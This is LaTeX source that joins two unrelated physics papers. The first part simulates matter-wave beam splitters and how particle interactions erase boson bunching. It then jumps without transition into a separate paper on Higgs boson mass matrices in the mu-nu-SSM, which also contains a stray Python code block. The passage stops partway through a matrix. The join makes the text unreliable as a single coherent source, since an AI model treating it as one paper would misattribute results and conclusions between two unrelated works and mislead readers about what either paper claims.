In our numerical calculations we employ the split operator method \cite{split}
\begin{equation}
\exp \left[ -i(T+U)\Delta t/\hbar \right] \approx
\exp \left[ -iT\Delta t/\hbar \right]
\exp \left[ -iU\Delta t/\hbar \right] . \label{a25}
\end{equation}
The corrections to this are given by
\begin{equation}
\left[ T,U\right] \frac{\Delta t^2}{2\hbar ^2}=
\left|\left( \frac{\widetilde{\Delta t}^2\widetilde{\omega}^2}4\right)
\left(\frac{\widetilde{x}\,\widetilde{p}+\widetilde{p}\,\widetilde{x}}
{\widetilde{\hbar }}\right)\right| .
\label{a26}
\end{equation}
In order to achieve satisfactory numerical accuracy, this should not be too
large; in our calculations, with $\Delta t=0.001$,
$\widetilde{\omega}=30$ and $\widetilde{\hbar}=6$
the expectation value of expression (\ref{a26}) is of the order of $10^{-4}$.
Decreasing $\Delta t$ or the grid spacing has been found not to change
our results significantly.
In the following discussion, we use the scaled variables, but for
simplicity, we do not indicate this in the notation. Whenever variables
are assigned dimensionless values, these refer to the scaled versions.
In order to achieve beam splitter operation, we let the distance between the
potential wells vary in the following way
\begin{equation}
d(z)=2+d_0-\frac 2{\cosh (z/\eta)}, \label{a27}
\end{equation}
which inserted into Eq. (\ref{a7}) gives a potential surface as shown in Fig.
\ref{pot}. To test its operation as beam splitter,
we let a wave packet approach the
coupling region in one of the channels, and follow its progress through the
intersection numerically as a two-dimensional problem. The result is shown
in Fig. \ref{2dwave}. We see that the parameters chosen lead to ideal
50-50 splitting of
the incoming wave packet. The progress of the wave packet through the
interaction region is steady and nearly uniform, and no backscattering is
observed. This suggests simplifying the situation so that the motion in the
$z$-direction is replaced by a constant velocity, and the full quantum problem
is computed only in the $x$-direction. If the wave packet is long enough in
the $z$-direction, its velocity is well defined, and this should be a good
approximation.
The implementation of such a paraxial approach becomes imperative when we
want to put two particles into the structure. The full two-dimensional
integration would require the treatment of four degrees of freedom, which is
demanding on the computer resources. With the paraxial approximation,
two particles can be treated by a two-dimensional numerical approach,
which is within the resources available.
To introduce the paraxial approximation, we perform a Galilean
transformation of the wave function to a co-moving frame
\begin{equation}
\psi (x,z,t)=\varphi (x,\varsigma ,t)\exp \left[ \frac i{\hbar }\left(
p_0z-\frac{p_0^2t}{2m}\right) \right] , \label{a28}
\end{equation}
where
\begin{equation}
\varsigma =z-\frac{tp_0}m. \label{a29}
\end{equation}
The initial momentum in the $z$-direction is denoted by $p_0$. The new wave
function is found to obey the Schr\"{o}dinger equation
\begin{equation}
i\hbar \frac \partial {\partial t}\varphi (x,\varsigma ,t)=\left[ -\frac{
\hbar ^2}{2m}\left( \frac{\partial ^2}{\partial x^2}+\frac{\partial ^2}{
\partial \varsigma ^2}\right) +U\left( x,\varsigma +\frac{tp_0}m\right)
\right] \varphi (x,\varsigma ,t). \label{a30}
\end{equation}
For a well defined momentum $p_0$, the wave packet is very broad in the
$\varsigma $-direction and its derivatives with respect to $\varsigma $ may
be neglected. The corresponding degree of freedom disappears, and it is
replaced by a potential sweeping by with velocity $p_0/m.$ This is what we
call the paraxial approximation.
Taking the parameters from the integration in Fig. \ref{2dwave}, we
can obtain the beam splitting operation also in the paraxial
approximation as shown in Fig. \ref{1dwave}.
The transfer of the wave packet from one well to the linear superposition is
shown in Fig. \ref{probsplit}. This confirms that the potential
configuration works exactly as in the analytic result (\ref{a13}).
Now the integration is one-dimensional for a single particle, and it is easy
to investigate the tunneling probability as a function of the parameters. In
Fig. \ref{T} we display the transition rate $T$ as a function of the
parameter $d_0^2$,
which controls the coupling between the wells. For small values,
$d_0^2 < 3,$
we are in a coherent flipping region; the wave packet is transferred back
and forth between the wells and resonant transmission occurs. For larger
values, $d_0^2 > 3,$ the analytic estimate of the logarithmic dependence in
Eq. (\ref{a9}) is seen to hold approximately. Our calculations use
$d_0=1.8903$, which gives $T=1/2$.
\subsection{Effects of quantum statistics }
We can now integrate the propagation of a two-particle wave function by
choosing the initial state to be combinations of
\begin{equation}
\varphi _{L(R)}^0(x)=N\exp \left[ -{\omega\over{2\hbar}}
\left( x\pm (1+{1\over 2}d_0)\right)^2 \right] , \label{a31}
\end{equation}
where the $+$ $(-)$ refers to the particle entering in the left (right)
channel. For bosons, this is used in the combination (\ref{a15}) and
integrated in the potential (\ref{a7}), where the $z-$dependence is replaced
by a $t-$dependence according to Eq. (\ref{a30}). The result is shown in
Fig. \ref{boseV0}. At $t=-10$, the bosons enter symmetrically in the
two input channels,
i.e. they have different signs for their coordinates. After being mixed at
time $t=0$, they emerge together with equal strength at both output
channels, i.e. their coordinates have the same sign. This result fully
reproduces the behavior expected from bosons at a 50-50 beam splitter.
We can, however, also test the fermionic case by using the state (\ref{a18})
as the initial one. The result is shown in Fig. \ref{fermiV0}.
Near $t=0$, the wave
packets follow the potential wells, but they remain separated and emerge at
different outputs as expected. Fermions do not like to travel together.
We have thus been able to verify the properties of a 50-50 beam splitter on
massive particles represented by wave packets travelling in potential
structures. The calculations in Figs. \ref{boseV0} and \ref{fermiV0}
do not, however, include any
particle interactions. We can now proceed to include these, and evaluate
their effect on the manifestations of quantum statistics.
When we introduce the interaction, we have to decide which type of physical
system we have in mind. Conduction electrons or ions interact through the
Coulomb force whereas neutral atom interactions may be described by a force
of the Lennard-Jones form. In both cases, the interaction is singular at the
origin, and it has to be regularized there. We do this by introducing the
variable
\begin{equation}
r_\varepsilon =\sqrt{r^2+\varepsilon ^2}. \label{a32}
\end{equation}
This makes the interaction energy finite when the particles overlap,
but does not affect the main part of our argument in other ways.
With this notation the Coulomb interaction is written
\begin{equation}
V_C(r)=\frac{V_0}{r_\varepsilon }, \label{a33}
\end{equation}
and the Lennard-Jones interaction is
\begin{equation}
V_{LJ}(r)=V_0\left[ \left( \frac b{r_\varepsilon }\right) ^{12}-\left( \frac
b{r_\varepsilon }\right) ^6\right] ; \label{a34}
\end{equation}
this contains the additional range parameter $b$. In both cases, the strength
of the interaction is regulated by $V_0.$
It is straightforward to integrate the Schr\"{o}dinger equation with the
two-particle interaction included, and look how its increase affects the
correlations imposed by quantum statistics. For fermions, the effect is
essentially not seen in the parameter ranges we are able to cover. As seen
from Fig. \ref{fermiV0}, the particles never really approach each other,
and they
remain separated due to their quantum statistics for all times; the
interaction does not affect them.
For bosons the effect is different. We have investigated their behavior for
a range of interaction parameters and find that an increase in the
interaction does destroy the simple behaviors found for noninteracting ones.
The result of such an integration is found in
Fig. \ref{boseV50}. Compared with Fig. \ref{boseV0}
this shows that now the particles appear in separate channels with about the
same probability as in the same channels. Thus the statistical effect has
been destroyed. Fig. \ref{probV50} shows how the result emerges during the time
evolution; the system tries to achieve the ideal case, but settles to the
final state observed in Fig. \ref{boseV50}.
Figure \ref{ljint} shows how an increase in the interaction strength
destroys the ideal
behavior. This is drawn using a Lennard-Jones potential, but the behavior
is similar for other cases we have investigated.
One unexpected feature emerged from our calculations: The destruction of the
ideal behavior turned out to be independent of the sign of the interaction.
One may have expected an attractive interaction between the bosons to
enhance their tendency to appear together, but this turned out not to be the
case. In order to understand this feature we have to turn to our simple
analytic argument in Sec. \ref{smod} and investigate the interplay between
two-particle states and the interaction.
\section{Statistics versus interactions}
In order to introduce the particle interaction, we choose a convenient basis
for the two-particle states. As the first component we choose the bosonic
state (\ref{a15})
\begin{equation}
u_1=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)+\varphi _L(2)
\varphi_R(1)\right) . \label{a35}
\end{equation}
In addition, there are two more bosonic states, where the particles enter in
the same channels
\begin{eqnarray}
u_2 & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _L(2)+\varphi
_R(2)\varphi _R(1)\right) \nonumber\\
& = & \frac 1{\sqrt{2}}\left( \psi _A(1)\psi _A(2)+\psi _S(1)\psi
_S(2)\right)
\label{a36}
\end{eqnarray}
and
\begin{eqnarray}
u_3 & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _L(2)-\varphi
_R(2)\varphi _R(1)\right)\label{a37} \\
& = & \frac 1{\sqrt{2}}\left( \psi _S(1)\psi _A(2)+\psi _A(1)\psi
_S(2)\right) .\nonumber
\end{eqnarray}
As the last component we have the fermionic basis function (\ref{a18})
\begin{equation}
u_4=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)-\varphi _L(2)\varphi
_R(1)\right) . \label{a38}
\end{equation}
Together the functions $\{u_i\}$ form a complete Bell state basis for the
problem. They are also convenient for the introduction of particle
interactions. In the states $u_1$ and $u_4$ the wave functions overlap only
little, and the effect of the interaction is small. For the states
$u_2$ and $u_3$ they sit on top of each other and feel the interaction
strongly. We treat this in a Hubbard-like fashion by saying that the energy
of the latter states is changed by the amount $2\overline{V}\propto V_0$.
Because the overlap between $\varphi_L$ and $\varphi_R$ is small, we have
$(u_1,Vu_1)\approx (u_4,Vu_4)$ and $(u_2,Vu_2)\approx (u_3,Vu_3)$, and
we can use the definition
\begin{eqnarray}
2\overline{V}&=&{1\over 2}\left[(u_2,Vu_2)+(u_3,Vu_3)-
(u_1,Vu_1)-(u_4,Vu_4)\right]\\
&\approx&\int\int\varphi(x)^2\varphi(y)^2 V(|x-y|) dx dy-
\int\int\varphi(x)^2\varphi(y-d_0)^2 V(|x-y|) dx dy, \nonumber
\end{eqnarray}
where $V$ is either a Coulomb or Lennard-Jones interaction.
The first terms give the effective interaction energy when both
particles sit in the same potential groove. In the states $u_1$ and
$u_4$ both grooves are occupied and because they are at their closest
at $z=0$, we subtract the mutual interaction energy across the
separating barrier to obtain the pure local interaction energy.
The second line results if we approximate both $\varphi_L$ and
$\varphi_R$ by a Gaussian $\varphi$ with the same width. From
Eq. (\ref{a17}) we see that only the states $u_1$ and $u_2$ are coupled by
the tunneling rate $2\Omega .$ Thus if we express the state by
\begin{equation}
\Psi =a_1u_1+a_2u_2+a_3u_3+a_4u_4, \label{a39}
\end{equation}
the state vector $[a_1,a_2,a_3,a_4]$ evolves with the Hamiltonian
\begin{equation}
\left[
\begin{array}{cccc}
2\overline{E} & -2\hbar\Omega & 0 & 0 \\
-2\hbar\Omega & 2\overline{E}+2\overline{V} & 0 & 0 \\
0 & 0 & 2\overline{E}+2\overline{V} & 0 \\
0 & 0 & 0 & 2\overline{E}
\end{array}
\right] =2 \overline{E}+\overline{V} +\left[
\begin{array}{cccc}
-\overline{V} & -2\hbar\Omega & 0 & 0 \\
-2\hbar\Omega & \overline{V} & 0 & 0 \\
0 & 0 & \overline{V} & 0 \\
0 & 0 & 0 & -\overline{V}
\end{array}
\right] . \label{a40}
\end{equation}
The constant part does not affect the coupling between the states, and the
amplitudes $a_3$ and $a_4$ decouple. The remaining ones flip at the
effective rate
\begin{equation}
\Omega _{\rm{eff}}=\frac 12\sqrt{4\Omega^2
+\overline{V}^2/\hbar^2 }. \label{a41}
\end{equation}
This result shows that the new parameter replacing $\Omega$ in
Eq. (\ref{a11}) is $\Omega
_{\rm{eff}},$ implying that the perfect boson behavior is expected to be
destroyed for
\begin{equation}
\frac{\overline{V}}{2\hbar\Omega }\sim \sqrt{3}=1.73. \label{a42}
\end{equation}
This is in approximate agreement with the result shown in Fig. \ref{ljint}.
By inspecting Fig. \ref{probV50}, we can also verify that the flipping
does occur
faster when we switch on the interaction, as expected from Eq. (\ref{a41}).
In the simplified analytic treatment, the only influence of the potential
was through its strength $| \overline{V}| .$ Hence we expect the
results to scale with the parameter
$\left( | \overline{V}| /2\hbar\Omega
\right) $ where $2\hbar\Omega =E_A-E_S.$
The probability to emerge in the same
output channels should essentially depend on this only; a certain
universality is expected.
In Fig. \ref{univ}, we have plotted this probability for a variety
of potentials including both Coulomb and Lennard-Jones ones. As we
can see, the behavior is very similar, at
$\left( | \overline{V}| /2\hbar\Omega \right)\approx 1.7$
the probability has decreased to less than 10\% in agreement with our
expectation. This verifies the degree of universality achieved.
For comparison, we also used the simple analytic theory to obtain the
points along the curve.
In this treatment, $2\Omega$ was assumed to be constant during
some finite coupling time $t$, according to Eq. (\ref{a14}). By inspecting
Fig. \ref{probsplit}, we conclude that $t$ should be of the order of unity.
Here $2\hbar\Omega$ was chosen to be 8, and the time
evolution in the subspace $\{ u_1, u_2 \} $ was calculated. This
agrees best with the numerical results for small $\overline{V}$; for larger
values of $\overline{V}$ the simple analytic treatment becomes invalid.
\section{Discussion and Conclusions}
The actual values of $\xi$, $\tau$, $m$ and $\omega$ depend on the
physical system we have in mind. Our calculations are carried out at
$\widetilde{\omega}=30$ and $\widetilde{\hbar}=6$; the momentum in the
$z$-direction of the incoming wave packet is $\widetilde{p}_z=30$ or
$\widetilde{p}_z=1000$.
If we consider an atomic beam splitter for Rb atoms,
setting the length scale $\xi$ to 100~nm corresponds to a time scale
$\tau$ of $80~\mu$s according to Eq. (\ref{a23}). A displacement of
400~nm from the center of one valley in the $x$-direction gives
a potential energy increase of roughly 10~mK, i.e. a transverse
velocity of 0.15~m/s. This is to be compared with a typical height of
the confining potential in a hollow optical fiber, a few tens of
mK \cite{ito,yin}. Taking $\widetilde{p}_z=1000$ yields a beam
velocity of 1.3~m/s in the $z$-direction.
If we consider a mesoscopic electron beam splitter built on GaAs,
$\xi$ could be of the order of 40 nm, which means that the closest
distance $d_0$ between the valleys is 80 nm. This would correspond to
$\tau=6$ ps, i.e. the electron goes through the device in a few
picoseconds. With $\widetilde{p}_z=30$, the
kinetic energy of the electron due to the
motion in the $z$-direction would be of the order of 0.01~eV.
A displacement of 100 nm from the
center of one valley in the $x$-direction corresponds to a potential
energy increase of roughly 0.05~eV, well below the
bandgap of GaAs ($\approx 1.4$~eV).
The parameter ranges chosen in our illustrative computations may not
be experimentally optimal, but they indicate that the effects are not
totally outside the range of real systems. Even though our calculations
are based on a rather simplified model, they suggest effects that should
be within reach of realistic setups. The main problem is to
prepare the appropriate quantum states, launch them into the structures
and retain their quantum coherence during the interaction. With atomic
cooling and trapping techniques, this may be feasible in the near
future. For electrons the possibility to retain quantum coherence is
still an open question.
We have chosen to discuss the straightforward question of particle
statistics
at a beam splitter. This is a simple situation, which, however,
presents genuine quantum features. For information processing and
quantum logic slightly more complicated networks are needed. Simple
gate operation can be achieved along the lines described in
Ref. \cite{kir}, which was formulated in terms of conduction
electrons, but similar situations can be envisaged for interacting
atoms.
In this paper we suggest an analytic model, which can be used to analyze
the behavior of particle networks confined to potential grooves in
two-dimensional structures as discussed also by Schmiedmayer
\cite{sch}. For complicated situations, the full numerical treatment
rapidly becomes intractable and simplified qualitative tools are
needed. We hope to have contributed to the development of such methods
in the present paper.
\acknowledgments
One of us (SS) thanks Dr. J\"org Schmiedmayer for inspiring
discussions. MTF thanks Patrick Bardroff for fruitful discussions.
\indent
Since the ATLAS and CMS Collaborations reported the significant discovery of a new neutral Higgs boson~\cite{ATLAS,CMS}, the Higgs boson mass is now precisely measured by~\cite{ATLAS-CMS}
\begin{eqnarray}
m_h=125.09\pm 0.24\: {\rm{GeV}}.
\end{eqnarray}
Therefore, the precisely measured Higgs boson mass provides the most stringent constraints on the parameter space of the standard model and its various extensions.
As a supersymmetric model, the ``$\mu$ from $\nu$ supersymmetric standard model'' ($\mu\nu$SSM) has the superpotential:~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,ref-zhang-LFV,ref-zhang2,ref-zhang-HLFV}
\begin{eqnarray}
&&W={\epsilon _{ab}}\left( {Y_{{u_{ij}}}}\hat H_u^b\hat Q_i^a\hat u_j^c + {Y_{{d_{ij}}}}\hat H_d^a\hat Q_i^b\hat d_j^c
+ {Y_{{e_{ij}}}}\hat H_d^a\hat L_i^b\hat e_j^c + {Y_{{\nu _{ij}}}}\hat H_u^b\hat L_i^a\hat \nu _j^c \right)
\nonumber\\
&&\hspace{0.95cm}- {\epsilon _{ab}}{\lambda _i}\hat \nu _i^c\hat H_d^a\hat H_u^b + \frac{1}{3}{\kappa _{ijk}}\hat \nu _i^c\hat \nu _j^c\hat \nu _k^c \:,
\label{eq-W}
\end{eqnarray}
where $\hat H_u^T = \Big( {\hat H_u^ + ,\hat H_u^0} \Big)$, $\hat H_d^T = \Big( {\hat H_d^0,\hat H_d^ - } \Big)$, $\hat Q_i^T = \Big( {{{\hat u}_i},{{\hat d}_i}} \Big)$, $\hat L_i^T = \Big( {{{\hat \nu}_i},{{\hat e}_i}} \Big)$ are $SU(2)$ doublet superfields, and $Y_{u,d,e,\nu}$, $\lambda$, and $\kappa$ are dimensionless matrices, a vector, and a totally symmetric tensor, respectively. $a,b=1,2$ are SU(2) indices with antisymmetric tensor $\epsilon_{12}=1$, and $i,j,k=1,2,3$ are generation indices. The summation convention is implied on repeated indices in this paper.
Besides the superfields of the MSSM~\cite{MSSM,MSSM1,MSSM2,MSSM3,MSSM4}, the $\mu\nu$SSM introduces three singlet right-handed neutrino superfields $\hat{\nu}_i^c$ to solve the $\mu$ problem~\cite{m-problem} of the MSSM. Once the electroweak symmetry is broken (EWSB), the effective $\mu$ term $-\epsilon _{ab} \mu \hat H_d^a\hat H_u^b$ is generated spontaneously through right-handed sneutrino vacuum expectation values (VEVs), $\mu = {\lambda _i}\left\langle {\tilde \nu _i^c} \right\rangle$. Additionally, three tiny neutrino masses can be generated at the tree level through a TeV scale seesaw mechanism~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,ref-zhang-LFV,ref-zhang2,meu-m,meu-m1,meu-m2,meu-m3,
neu-zhang1,neu-zhang2,ref-zhang3}.
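For orientation, the scale of the resulting neutrino masses follows the usual seesaw relation $m_\nu \sim (Y_\nu \upsilon _u)^2/M$; the sketch below uses the $Y_\nu \sim \mathcal{O}(10^{-7})$ constraint quoted in Sec.~\ref{sec2}, while $\upsilon_u$ and the TeV-scale right-handed mass $M$ are assumed representative values:

```python
# Order-of-magnitude seesaw estimate, m_nu ~ (Y_nu * v_u)^2 / M.
Y_nu = 1.0e-7
v_u = 174.0      # GeV (assumed electroweak-scale VEV)
M = 1000.0       # GeV (assumed TeV-scale right-handed neutrino mass)

m_nu_eV = (Y_nu * v_u) ** 2 / M * 1e9    # GeV -> eV
print(m_nu_eV)   # sub-eV, consistent with a TeV-scale seesaw
```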
In the $\mu\nu$SSM, the left- and right-handed sneutrino VEVs lead to the mixing of the neutral components of the Higgs doublets with the sneutrinos producing an $8\times8$ CP-even neutral scalar mass matrix, which can be seen in Refs.~\cite{mnSSM1,mnSSM2,ref-zhang1}. Therefore, the mixing would affect the lightest Higgs boson mass. In this work, we analytically diagonalize the CP-even neutral scalar mass matrix, which would be conducive to the follow-up study on the Higgs sector. In the meantime, we consider the Higgs boson mass corrections with effective potential methods. We also give an approximate expression for the lightest Higgs boson mass. In numerical analysis, we will analyze how the mixing affects the lightest Higgs boson mass.
Our presentation is organized as follows. In Sec.~\ref{sec2}, we briefly summarize the Higgs sector of the $\mu\nu$SSM, including the Higgs boson mass corrections. We present the diagonalization of the neutral scalar mass matrix analytically in Sec.~\ref{sec3}. The numerical analyses are given in Sec.~\ref{sec-num}, and Sec.~\ref{sec-sum} provides a summary. The tedious formulas are collected in the Appendixes.
\section{The Higgs sector\label{sec2}}
\indent
The Higgs sector of the $\mu\nu$SSM contains the usual two Higgs doublets with the left- and right-handed sneutrinos: $\hat H_d^T = \Big( {\hat H_d^0,\hat H_d^ - } \Big)$, $\hat H_u^T = \Big( {\hat H_u^ + ,\hat H_u^0} \Big)$, $\hat{\nu}_i$ and $\hat{\nu}_i^c$. After EWSB, the neutral scalars acquire the VEVs:
\begin{eqnarray}
\langle H_d^0 \rangle = \upsilon_d , \qquad \langle H_u^0 \rangle = \upsilon_u , \qquad
\langle \tilde \nu_i \rangle = \upsilon_{\nu_i} , \qquad \langle \tilde \nu_i^c \rangle = \upsilon_{\nu_i^c} .
\end{eqnarray}
One can define the neutral scalars as
\begin{eqnarray}
&&H_d^0=\frac{1}{\sqrt{2}} \Big(h_d + i P_d \Big) + \upsilon_d, \qquad\; \tilde \nu_i = \frac{1}{\sqrt{2}} \Big((\tilde \nu_i)^\Re + i (\tilde \nu_i)^\Im \Big) + \upsilon_{\nu_i}, \nonumber\\
&&H_u^0=\frac{1}{\sqrt{2}} \Big(h_u + i P_u \Big) + \upsilon_u, \qquad \tilde \nu_i^c = \frac{1}{\sqrt{2}} \Big((\tilde \nu_i^c)^\Re + i (\tilde \nu_i^c)^\Im \Big) + \upsilon_{\nu_i^c}.
\end{eqnarray}
Considering that the neutrino oscillation data constrain neutrino Yukawa couplings $Y_{\nu_i} \sim \mathcal{O}(10^{-7})$ and left-handed sneutrino VEVs $\upsilon_{\nu_i} \sim \mathcal{O}(10^{-4}{\rm{GeV}})$~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,meu-m,meu-m1,meu-m2,meu-m3,
neu-zhang1,neu-zhang2}, in the following we can reasonably neglect the small terms including $Y_{\nu}$ or $\upsilon_{\nu_i}$ in the Higgs sector. Then, the superpotential in Eq.~(\ref{eq-W}) approximately leads to the tree-level neutral scalar (Higgs) potential:
\begin{eqnarray}
V^0=V_F+V_D+V_{soft},
\end{eqnarray}
with
\begin{eqnarray}
&&V_F=\lambda_i \lambda_i^* H_d^0 H_d^{0*} H_u^0 H_u^{0*}+\lambda_i \lambda_j^* \tilde\nu_i^c \tilde\nu_j^{c*} (H_d^0 H_d^{0*}+ H_u^0 H_u^{0*})\nonumber\\
&&\hspace{1.0cm} + \, \kappa_{ijk}\kappa_{ljm}^* \tilde\nu_i^c \tilde\nu_k^{c} \tilde\nu_l^{c*} \tilde\nu_m^{c*} - ( \kappa_{ijk}\lambda_j^* \tilde\nu_i^c \tilde\nu_k^{c} H_d^{0*} H_u^{0*}+ {\rm{H.c.}}),\\
&&V_D=\frac{G^2}{8}(\tilde\nu_i \tilde\nu_i^{*} +H_d^0 H_d^{0*}- H_u^0 H_u^{0*})^2,\\
&&V_{soft}=m_{{H_d}}^{2} H_d^0 H_d^{0*} + m_{{H_u}}^2 H_u^0 H{_u^{0*}}
+ m_{{{\tilde L}_{ij}}}^2\tilde \nu_i \tilde\nu_j^{*} + m_{\tilde \nu_{ij}^c}^2\tilde \nu{_i^{c}}\tilde \nu_j^{c*}\nonumber\\
&&\hspace{1.3cm} - \,\Big((A_{\lambda}\lambda)_i \nu{_i^{c}} H_d^0 H_u^{0} - \frac{1}{3} (A_{\kappa}\kappa)_{ijk} \tilde\nu{_i^{c}}\tilde \nu{_j^{c}}\tilde \nu{_k^{c}} + {\rm{H.c.}}\Big),
\end{eqnarray}
where $G^2=g_1^2+g_2^2$ and $g_1 c_{_W} =g_2 s_{_W}=e$, $V_F$ and $V_D$ are the usual $F$ and $D$ terms derived from the superpotential, and $V_{soft}$ denotes the soft supersymmetry breaking terms. For simplicity, we will assume that all parameters in the potential are real in the following.
With effective potential methods~\cite{Hi-1,Hi-2,Hi-3,Hi-4,Hi-5,Hi-6,Hi-7,Hi-8,Hi-alpha,Hi-9,Hi-10,Hi-11,Hi-12,Hi-13,Hi-14,Hi-15}, the one-loop effective potential can be given by
\begin{eqnarray}
&&V^1=\frac{1}{32\pi^2}\Big\{ \sum\limits_{\tilde f} N_f m_{\tilde f}^4 \Big( \log \frac{m_{\tilde f}^2}{Q^2} -\frac{3}{2}\Big) -2 \sum\limits_{f= t, b,\tau} N_f m_{f}^4 \Big( \log \frac{m_{f}^2}{Q^2} -\frac{3}{2}\Big) \Big\},
\end{eqnarray}
where $Q$ denotes the renormalization scale, $N_t=N_b=3$, $N_\tau=1$, and $\tilde f=\tilde t_{1,2},\tilde b_{1,2},\tilde \tau_{1,2}$. The masses of the third-generation fermions $f= t, b,\tau$ and their supersymmetric partners in the $\mu\nu$SSM are collected in Appendix~\ref{app1}. Including the one-loop effective potential, the Higgs potential is written as
\begin{eqnarray}
V=V^0+V^1.
\end{eqnarray}
Through the Higgs potential, we will calculate the minimization conditions of the potential and the Higgs masses in the following.
Minimizing the Higgs potential, we can obtain the minimization conditions of the potential, linking the soft mass parameters to the VEVs of the neutral scalar fields:
\begin{eqnarray}
&&m_{{H_d}}^2= -\Delta T_{H_d} + ((A_\lambda \lambda)_i \upsilon_{\nu_i^c} + {\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_k^c} )\tan\beta \nonumber\\
&&\hspace{1.4cm} - \, ({\lambda _i}{\lambda _j}\upsilon_{\nu_i^c}\upsilon_{\nu_j^c} + {\lambda _i}{\lambda _i}\upsilon_u^2) + \frac{G^2}{4}( \upsilon_u^2 - \upsilon_d^2),\\
&&m_{{H_u}}^2= -\Delta T_{H_u} + ((A_\lambda \lambda)_i \upsilon_{\nu_i^c} + {\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_k^c})\cot\beta\nonumber\\
&&\hspace{1.4cm} - \, ({\lambda _i}{\lambda _j}\upsilon_{\nu_i^c}\upsilon_{\nu_j^c} + {\lambda _i}{\lambda _i}\upsilon_d^2) + \frac{{G^2}}{4}(\upsilon_d^2 - \upsilon_u^2) , \\
&&m_{\tilde \nu_{ij}^c}^2 \upsilon_{\nu_j^c}= -\Delta T_{\tilde \nu_{ij}^c} \upsilon_{\nu_j^c} + (A_\lambda \lambda)_i{\upsilon_d}{\upsilon_u} - {( A_\kappa \kappa)}_{ijk} \upsilon_{\nu_j^c} \upsilon_{\nu_k^c} + 2{\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_k^c}{\upsilon_d}{\upsilon_u} \nonumber\\
&&\hspace{1.9cm} - \, 2{\kappa _{lim}}{\kappa _{ljk}} \upsilon_{\nu_m^c} \upsilon_{\nu_j^c} \upsilon_{\nu_k^c} - {\lambda _i}{\lambda _j}\upsilon_{\nu_j^c}(\upsilon_d^2 + \upsilon_u^2) , \quad(i=1,2,3)
\end{eqnarray}
where, as usual, $\tan\beta ={\upsilon_u}/{\upsilon_d}$. $\Delta T_{H_d}$, $\Delta T_{H_u}$, and $\Delta T_{\tilde \nu_{ij}^c} \upsilon_{\nu_j^c}$ denote the one-loop corrections to the minimization conditions, which are collected in Appendix~\ref{app2}. Here, neglecting the small terms including $Y_{\nu}$ or $\upsilon_{\nu_i}$ in the Higgs sector, we do not give the minimization conditions of the potential with respect to the left-handed sneutrino VEVs, which can be used to constrain $\upsilon_{\nu_i}$~\cite{meu-m,neu-zhang2}.
From the Higgs potential, one can derive the $8\times8$ mass matrices for the CP-even neutral scalars ${S'^T} = ({h_d},{h_u},{(\tilde \nu_i^c)^\Re},{({\tilde \nu_i})^\Re})$ and the CP-odd neutral scalars ${P'^T} = ({P_d},{P_u},{(\tilde \nu_i^c)^\Im},{({\tilde \nu_i})^\Im})$ in the unrotated basis. Neglecting the small terms involving $Y_{\nu}$ or $\upsilon_{\nu_i}$, the $5\times5$ mass submatrix for the Higgs
doublets and right-handed sneutrinos essentially decouples from the $3\times3$ left-handed sneutrino mass submatrix. The latter is $\Big(m_{\tilde L_{ij}}^2 + \frac{G^2}{4}(\upsilon_d^2 - \upsilon_u^2 )\delta_{ij}\Big)_{3\times3}$, which is dominated by the soft mass $m_{\tilde L_{ij}}^2$. From the Higgs potential, the $5\times5$ mass submatrix for the Higgs doublets and right-handed sneutrinos in the CP-even sector can be derived as
\begin{eqnarray}
M_S^2 = \left( {\begin{array}{*{20}{c}}
M_{H}^2 & M_{X}^2 \\
\Big(M_{X}^{2}\Big)^T & M_{R}^2 \\
\end{array}} \right),
\end{eqnarray}
where $M_{H}^2$ denotes the $2\times2$ mass submatrix for Higgs doublets, $M_{R}^2$ is the $3\times3$ mass submatrix for right-handed sneutrinos and $M_{X}^2$ represents the $2\times3$ mass submatrix for the mixing of Higgs doublets and right-handed sneutrinos.
In detail, the $2\times2$ mass submatrix $M_{H}^2$ can be written as
\begin{eqnarray}
M_H^2 = \left( {\begin{array}{*{20}{c}}
M_{h_d h_d}^2+\Delta_{11} & M_{h_d h_u}^2+\Delta_{12} \\
M_{h_d h_u}^2+\Delta_{12} & M_{h_u h_u}^2+\Delta_{22} \\
\end{array}} \right),
\end{eqnarray}
with the tree-level contributions as
\begin{eqnarray}
&&M_{h_d h_u}^2 = -\Big[m_A^2+\Big(1-4\lambda_i \lambda_i s_{_W}^2 c_{_W}^2/e^2 \Big)m_Z^2\Big] \sin \beta \cos \beta, \\
&&M_{h_d h_d}^2 = m_A^2 \sin^2 \beta+m_Z^2 \cos^2 \beta, \\
&&M_{h_u h_u}^2 = m_A^2 \cos^2 \beta+m_Z^2 \sin^2 \beta,
\end{eqnarray}
and the neutral pseudoscalar mass squared as
\begin{eqnarray}
m_A^2\simeq \frac{2}{{\sin2\beta}}\Big[(A_\lambda \lambda)_i \upsilon_{\nu_i^c}+ {\lambda _k}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_j^c}\Big] .
\end{eqnarray}
Compared with the MSSM, $M_{h_d h_u}^2$ contains an additional term $(4\lambda_i \lambda_i s_{W}^2 c_{W}^2/e^2 )m_Z^2 \sin \beta \cos \beta$, which gives a new contribution to the lightest Higgs boson mass. The radiative corrections $\Delta_{11}$, $\Delta_{12}$, and $\Delta_{22}$ from the third-generation fermions ${f}={t},{b},{\tau}$ and their superpartners can be found in Ref.~\cite{ref-zhang2}; they agree with the results of the MSSM~\cite{Hi-1,Hi-2,Hi-3,Hi-4,Hi-5,Hi-6,Hi-7,Hi-8,Hi-alpha,Hi-9,Hi-10,Hi-11,Hi-12,Hi-13}. Here, the radiative corrections from the top quark and its superpartners include the two-loop leading-log effects, which significantly affect the mass of the lightest Higgs boson.
Furthermore, the $2\times3$ mixing mass submatrix $M_{X}^2$ is
\begin{eqnarray}
M_X^2 = \left( {\begin{array}{*{20}{c}}
\Big(M_{h_d (\tilde \nu_i^c)^\Re}^2+\Delta_{1(2+i)}\Big)_{1\times3} \\
\Big(M_{h_u (\tilde \nu_i^c)^\Re}^2+\Delta_{2(2+i)}\Big)_{1\times3} \\
